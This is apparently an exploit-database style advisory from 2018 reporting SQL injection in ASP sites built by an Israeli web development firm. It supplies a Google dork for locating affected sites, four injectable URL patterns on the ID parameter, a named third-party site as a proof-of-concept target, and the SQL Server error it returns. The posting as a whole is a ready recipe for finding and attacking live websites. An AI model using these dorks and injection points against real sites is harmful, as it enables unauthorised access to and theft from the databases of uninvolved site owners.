#################################################################################################
# Exploit Title : Israel PGN Network Web Development AppGate SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 04/06/2018
# Vendor Homepage : pgn.co.il / appgate.co
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
Israel PGN Providing All Web Solutions | Since 2001 © Netwok Web Design Development AppGate iPhone Application Development
# Google Dork : intext:''Pgn - בניית אתרים | AppGate''
# Exploit : /News.asp?ID=[SQL Injection]
# Exploit : /Article.asp?ID=[SQL Injection]
# Exploit : /Video.asp?ID=[SQL Injection]
# Exploit : /UserPost.asp?ID=[SQL Injection]
#################################################################################################
# Example Site => vole.co.il/News.asp?ID=6766' => [ Proof of Concept ] => archive.is/0BRpq
# SQL-DB Error =>
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.
/News.asp, line 40
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################